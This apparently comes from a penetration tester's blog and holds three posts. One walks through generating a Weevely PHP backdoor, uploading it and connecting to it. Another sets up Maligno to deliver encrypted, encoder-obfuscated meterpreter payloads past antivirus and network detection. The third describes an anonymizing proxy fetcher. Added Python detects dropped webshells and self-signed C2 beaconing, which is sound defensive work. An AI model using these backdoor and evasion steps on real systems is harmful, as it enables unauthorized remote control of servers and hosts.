Custom PHP backdoor shell with Weevely

by Cornel on 27/02/2015

Recently I’ve been finding more and more that I need a reliable PHP backdoor shell with a reputable history. From work experience I knew about the classic c99.php backdoor shell and knew that it wasn’t the direction I wanted to go in. If you haven’t read The Hacker Blog article on it, it’s definitely worth a read.

So I came across Weevely. What an awesome little backdoor! Here I’m just going to walk through the basic usage to get you up and running; it’s definitely one of the easiest routes to go if you’re going to be uploading a backdoor any time soon!

  1. On Kali, Weevely is already installed, so we can generate our backdoor with the password we will later use to connect to it. My password will be blagger.
    weevely generate blagger sneaky.php
  2. Next, for simplicity’s sake, I will upload the backdoor to my test web server using SFTP. Of course there are hundreds of other ways to get a PHP script onto a web server, but this is a demo. Because my web server runs on Amazon EC2, I need to remote in using a limited user account. Still, I can upload the file to the tmp directory to be moved by root.
  3. Finally, I’ll SSH in and move the uploaded backdoor into the public-facing web directory so that Weevely can reach it. Once it’s publicly accessible, point Weevely at the URL with the same password and your backdoor gets executed!
    weevely http://52.0.212.83/sneaky.php blagger
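The flip side of the three steps above is what the web server’s owner can do about them, and it is worth knowing before you drop a shell on an engagement. The following Python is an added example, not part of the original post and not Weevely’s own code: it scores PHP files for the usual webshell indicators (eval, base64_decode, variable function calls and so on) and diffs a SHA-256 manifest of the web root against a known-good baseline, so a freshly uploaded sneaky.php shows up even if its content scores low. The PHP samples, indicator weights and threshold are constructed for this demo.

```python
"""Catch a dropped PHP backdoor from the defender's side.

Added example, not part of the original post and not Weevely's own code.
Two checks a web admin can run: score PHP files for webshell indicators, and
diff a hash manifest of the web root against a known-good baseline so that a
new sneaky.php shows up even when its content scores low. The PHP samples,
indicator weights and threshold are all constructed for this demo.
"""
import hashlib
import re
from pathlib import Path

# (regex, weight): weights are a demo assumption, tune them for your code base.
INDICATORS = [
    (r"\beval\s*\(", 3),                                        # direct code evaluation
    (r"\bbase64_decode\s*\(", 2),                               # payload hidden in base64
    (r"\b(?:gzinflate|gzuncompress|str_rot13)\s*\(", 2),        # other unpack steps
    (r"\bpreg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e['\"]", 3),    # /e modifier == eval
    (r"\b(?:shell_exec|passthru|system|proc_open|popen)\s*\(", 2),
    (r"\$_(?:POST|GET|COOKIE|REQUEST)\s*\[", 1),                # attacker-controlled input
    (r"\$[A-Za-z_]\w*\s*\(\s*(?=\$)", 2),                       # variable function call $f($x)
    (r"\bstr_replace\s*\(", 1),                                 # common de-obfuscation step
    (r"['\"][A-Za-z0-9+/=]{40,}['\"]", 2),                      # long base64-looking literal
]


def score_php(source):
    """Return (score, matched patterns). Repeated hits of one pattern cap at 3."""
    score, hits = 0, []
    for pattern, weight in INDICATORS:
        n = len(re.findall(pattern, source))
        if n:
            hits.append(pattern)
            score += weight * min(n, 3)
    return score, hits


def is_suspicious(source, threshold=5):
    return score_php(source)[0] >= threshold


def manifest_from_files(files):
    """files: {relative path: bytes} -> {relative path: sha256 hex}."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in files.items()}


def manifest_from_dir(root):
    """Same thing for a real web root on disk."""
    root = Path(root)
    return manifest_from_files(
        {str(p.relative_to(root)): p.read_bytes() for p in root.rglob("*") if p.is_file()}
    )


def diff_manifest(baseline, current):
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
    }


# Constructed samples (not real malware): a normal page, a classic one-liner
# shell, and an obfuscated agent that never spells out eval( or base64_decode(.
BENIGN = """<?php
$title = htmlspecialchars($_GET['t'] ?? 'home');
echo "<h1>$title</h1>";
"""
ONE_LINER = """<?php
if (isset($_POST['cmd'])) { echo shell_exec($_POST['cmd']); }
eval(base64_decode('ZWNobyAnaGknOw=='));
"""
OBFUSCATED = """<?php
$k = str_replace('x', '', 'bxaxsxex6x4x_xdxexcxoxdxe');
$p = $_COOKIE['z'];
$f = 'eval';
$f($k($p));
"""

BASELINE_TREE = {"index.php": BENIGN.encode(), "css/site.css": b"body{margin:0}"}
AFTER_UPLOAD_TREE = dict(BASELINE_TREE, **{"sneaky.php": OBFUSCATED.encode()})


if __name__ == "__main__":
    for name, src in [("benign", BENIGN), ("one-liner", ONE_LINER), ("obfuscated", OBFUSCATED)]:
        print(name, score_php(src)[0], "SUSPICIOUS" if is_suspicious(src) else "ok")
    print(diff_manifest(manifest_from_files(BASELINE_TREE), manifest_from_files(AFTER_UPLOAD_TREE)))
```

The obfuscated sample is the interesting one: it scores on the variable function calls and the str_replace unpacking rather than on any keyword, which is why a signature-only scan of the file is not enough and why the manifest diff is the check that actually catches step 3 of the walkthrough.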


Meterpreter over SSL with Maligno

by Cornel on 2/07/2014

So I’ve decided I want my meterpreter sessions encrypted so that the traffic can’t be inspected in transit. It’s something I’ve wanted in the past but never really pursued, until I came across Maligno. Maligno is a platform from which you can launch Metasploit payloads over HTTPS; the payload is AES encrypted and base64 encoded before it is served. The payload pushed to the client can also be encoded any number of times with the Metasploit encoders, to avoid signature-based detection once it is decoded on the endpoint.

This is the process of setting up your server:

  1. Download and extract Maligno from its project page.
  2. Install the prerequisite packages:
    sudo apt-get update && sudo apt-get install python-ipcalc
  3. Generate the self-signed SSL cert to be used on your server:
    ./certgen.sh
  4. Configure server.conf to do the following:
    • Serve 3 different payloads to 3 different targets, all over port 443
    • Serve via https
    • Scope delivery to your network, so hosts outside it get nothing
    • Set the server IP to that of the Maligno host
  5. Generate the python scripts the clients will use to reach out to Maligno, one per configured payload:
    python clientgen.py -i 0 -f server.conf -o client1.py
    python clientgen.py -i 1 -f server.conf -o client2.py
    python clientgen.py -i 2 -f server.conf -o client3.py
  6. On a Windows machine, install Python 2.7, pycrypto and py2exe.
  7. Generate executables from the python scripts using py2exe for all 3 target clients.
  8. Start the Maligno server and the meterpreter handler to listen for incoming connections.
  9. Upon execution of your crafted executables, an encrypted meterpreter session is opened; in this test it was flagged by neither antivirus nor the NIDS. Keep in mind what the wire still shows, though: a TLS session to a self-signed certificate on 443 and client check-ins at regular intervals, both of which a NIDS with certificate or beaconing analytics can pick up.

    Enjoy responsibly. BYOB.
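To make the “what the wire still shows” point concrete, here is an added example, not part of the original post and not Maligno’s own code: it walks a small constructed TLS-connection log (pipe-delimited, with the timestamp, endpoints, port, issuer and subject fields that a sensor such as Zeek records) and flags client/server pairs that talk to a self-signed certificate on 443 at regular intervals. The hosts, certificate names and timings are made up for the demo; the jitter threshold and minimum connection count are my own choices.

```python
"""What a NIDS still sees when the payload is AES-encrypted over HTTPS.

Added example, not part of the original post and not Maligno's own code.
It walks a constructed TLS-connection log (pipe-delimited, with the fields
a sensor such as Zeek records) and flags client/server pairs that talk to a
self-signed certificate on 443 at regular intervals, the two things the
encryption does not hide. Hosts, certificate names and timings are made up.
"""
import statistics
from collections import defaultdict

FIELDS = ["ts", "src", "dst", "dport", "issuer", "subject"]

# Constructed log: 10.0.0.5 checks in with a Maligno-style host every ~60 s;
# 10.0.0.7 browses a CA-signed site at irregular times.
SAMPLE_LOG = """\
1000|10.0.0.5|203.0.113.10|443|CN=Maligno Server|CN=Maligno Server
1005|10.0.0.7|198.51.100.20|443|CN=Example CA|CN=www.example.net
1061|10.0.0.5|203.0.113.10|443|CN=Maligno Server|CN=Maligno Server
1119|10.0.0.5|203.0.113.10|443|CN=Maligno Server|CN=Maligno Server
1180|10.0.0.5|203.0.113.10|443|CN=Maligno Server|CN=Maligno Server
1241|10.0.0.5|203.0.113.10|443|CN=Maligno Server|CN=Maligno Server
1400|10.0.0.7|198.51.100.20|443|CN=Example CA|CN=www.example.net
1402|10.0.0.7|198.51.100.20|443|CN=Example CA|CN=www.example.net
2500|10.0.0.7|198.51.100.20|443|CN=Example CA|CN=www.example.net
"""


def parse_log(text):
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        rec = dict(zip(FIELDS, line.split("|")))
        rec["ts"] = float(rec["ts"])
        rec["dport"] = int(rec["dport"])
        records.append(rec)
    return records


def is_self_signed(rec):
    # A self-signed cert (what certgen.sh produces) has issuer == subject.
    return rec["issuer"] == rec["subject"]


def interval_stats(timestamps):
    """Mean gap between connections and its coefficient of variation (jitter)."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean else float("inf")
    return mean, cv


def find_beacons(records, min_conns=4, max_jitter=0.2):
    """Return findings for (src, dst) pairs that look like encrypted C2 check-ins."""
    by_pair = defaultdict(list)
    for rec in records:
        if rec["dport"] == 443:
            by_pair[(rec["src"], rec["dst"])].append(rec)
    findings = []
    for (src, dst), recs in sorted(by_pair.items()):
        reasons = []
        if any(is_self_signed(r) for r in recs):
            reasons.append("self-signed certificate")
        if len(recs) >= min_conns:
            mean, cv = interval_stats(r["ts"] for r in recs)
            if cv <= max_jitter:
                reasons.append("periodic check-in every %.0f s (jitter %.2f)" % (mean, cv))
        if len(reasons) == 2:   # both signals together is the shape of this setup
            findings.append({"src": src, "dst": dst, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_beacons(parse_log(SAMPLE_LOG)):
        print(f["src"], "->", f["dst"], "; ".join(f["reasons"]))
```

Neither signal depends on reading the payload. The self-signed certificate comes straight from certgen.sh in step 3, and the periodicity comes from however the client is scheduled to call home; adding jitter to the check-in and fronting the server with a CA-issued certificate are the two changes that would defeat this particular check.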


Anonymous Content Grabbing with Python

by Cornel on 22/01/2014

Anonymity

As a malware analyst, sometimes it’s necessary to obtain a sample of a website’s source code to manually evaluate any hidden malicious JavaScript. But why give up your IP address and possibly your exact whereabouts just to snoop around?

Fellow analysts, I give you my personal fully customized python-based anonymous browser, anonBrowser.py.

Nothing special, just a little terminal program that pulls a random proxy from a list, emulates a random browser with a forged User-Agent, and fetches the specified content through that proxy under its forged identity. It’s written to be easy to understand and easy to customize should you want to make changes to it.

Usage: ./anonBrowser.py -s URL

